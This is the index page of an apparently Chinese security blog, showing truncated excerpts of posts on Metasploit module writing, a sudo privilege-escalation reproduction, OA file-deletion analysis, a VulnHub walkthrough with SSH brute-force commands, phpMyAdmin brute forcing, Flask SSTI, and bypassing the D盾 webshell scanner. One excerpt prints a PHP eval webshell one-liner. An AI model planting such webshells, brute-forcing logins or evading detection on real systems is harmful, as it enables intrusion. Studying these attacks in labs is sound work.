只因不值得 
  • 首页
  • 归档
  • 分类
  • 关于
  • 友链
  •     

MSF模块编写初学

0x00 简介学习文章:(文章99%的代码来自下列学习文章中) 雷神众测 - 打造Metasploit 三米前有蕉皮 - Metasploit后渗透模块开发 官方文档: Github源码 metasploit Post Wiki 刚开始看,就挑简单的先写,因为msf使用的函数,需要自己在源码中查看,wiki也有一部分,但是没写全 不要问我为啥不看,问就是懒,没救了 0x01 基础格式讲解require 'msf/core' class MetasploitModule < Msf::Post def initialize(info={})
 2021-04-23   随手记   

CVE-2021-3156 Sudo提权漏洞复现

简介2021年1月26日,Sudo发布安全通告,修了一个基于堆的缓冲区溢出 任何本地用户,都可以利用此漏洞,而无需进行身份验证 Ps:攻击者不需要知道用户的密码,成功利用此漏洞可获得root权限 检查方法:以非root用户登录系统,并使用命令sudoedit -s / 以sudoedit开头的错误,表示可能存在漏洞 以usage开头的错误,表明补丁已生效 影响版本众多就不一一列举了 不影响版本 sudo => 1.9.5 p2 sudo官方位于1月26日已经修复,后面安装的sudo已经补上了 前天测试的时候Ubuntu最新版本已经补上 复现过程复现环境:Ubuntu
 2021-02-01   漏洞   

OA和深信服漏洞 简略分析

OA - 任意文件删除实测影响版本:通达OA V11.6(其他版本未测) 根据网上的exp直接定位到漏洞文件MYOA\webroot\module\appbuilder\assets\print.php 通达OA的文件需要进行解密才可以进行查看源码,否则是乱码 解密后,内容如下: 可以看到该页面并没有何的需要登录验证的文件包含 并且$s_tmp的并没进行任何的过滤直接带入了unlink()删除文件函数中 导致了任意文件的删除! 起始目录:/../../../../logs/appbuilder/logs/ 漏洞验证:删除一个txt文件 至于文件上传,看的有点糊涂就不写了 深信服任意文件登
 2020-08-23   代码审计  PHP   

VulnHub:Me-and-My-Girlfriend-1

简介第一次玩vulnhub,先根据了自己的思路来但是提权那我不会,按部就班的学习:https://www.freebuf.com/articles/others-articles/227157.html 题目下载地址:me-and-my-girlfriend-1 测试过程 nmap扫描主机nmap -A 192.168.177.129发现只开放了22和88端口 尝试SSH爆破:使用MSF自带的模块use auxiliary/scanner/ssh/ssh_login set RHOSTS 192.168.177.129 set USERNAME root set PASS_FILE /r
 2020-04-10   Web   

phpmyadmin爆破

分析环境: phpstudy2016 PHP5.4.5 对phpmyadmin进行抓包分析 可以看到提交的参数 pma_username=root&pma_password=root&server=1&token=a40f1e11ec5dd5b0a7d3ea945ae0adfb分别是:用户,密码,服务,token 查看下提交页面的源码以获取token token是可以在网页中获取到的,进行下一步提交 利用了GET方式向index.php提交了token,继续 GET方式向navigation.php提交了token,继续 提交了之后,可以看到网页显示了,一
 2020-02-25   Python   

Flask-SSTI (模板注入漏洞)

简介SSTI(Server-Side Template Injection):服务端模板注入,服务器模板中拼接了恶意用户输入导致各种漏洞通过模板,web应用可以把输入转换成特定的HTML文件或email格式 Jinja2:Flask作者开发的模板系统,存在三种分隔符语法从HTML转义 { % ... % }:控制结构 { { ... } }:变量取值,表达式打印到模板输出(是一种特殊的占位符) { # ... # }:注释 实战测试漏洞代码: from flask import Flask, request from jinja2 import Template app = Flask
 2020-01-29   漏洞   

先知文章爬虫

简介前几天,由于意见征集稿的出现 所以决定先把一些文章给爬下来,存着以待学习,转换成markdown的格式以便观看 转换md用的第三方模块:html2text Code思路: 用BS获取对应位置的内容 然后用html2text转换成md格式 Ps:先知的标题奇奇怪怪的,如果要用来做文件名,请用正则进行过滤,否则你会爬一天的。。。。 import requests import html2text,os,codecs,re from bs4 import BeautifulSoup # 获取网站源码 def get_html(url): result = requests.g
 2019-11-24   Python   

简陋POC框架编写

网上现在有很多类似的框架,甚至架构已经十分完善的(MSF,Pocsuite3),那我为啥还要重复造造轮子呢? 写了这么多的exp,放在那里很混乱,方便管理与更新 在写框架时,遇到了很多之前不曾想过的问题,在其他的框架的分析时,学到了很多 每次的编写,都是为了以后能够制作 总结:学到了就是我的了 大体结构 lib:存储核心文件 poc:存储 poc/exp 文件 main.py:启动脚本 Code颜色与banner文件:lib\common.py 控制端颜色输出:使用库colorama 至于为什么不使用其他的,因为我看着脑壳痛,拿个最简单的来使用吧 from colorama impo
 2019-11-17   Python   

PHP传值方式绕过D盾

起因这两天因phpstudy后门事件,郁闷的不行,用了这么久都没有发现。。。吓得我直接扔虚拟机了 啥都不会的我,只能拿D盾压压惊(其实是因为早就写好的绕过一片红,全部被加进了规则库) 现在网上流传的工具,开始逐渐的被各种杀软所识别,渐渐失效 各自研究的武器,都在各自的手里,我也没啥思路制作,总结:菜啊。。。 Code 先来看看,被查杀的一句话 class get{ public function setName($name){ return $this -> name = $name; } } $obj = new get(); $s = $obj -
 2019-09-24   Web   

PHP一句话过D盾

Code一个早期的webshell一句话,早就被查杀 <?php @eval($_POST[1]); ?>...
 2019-08-19   Web   
123…7

搜索

2018 只因不值得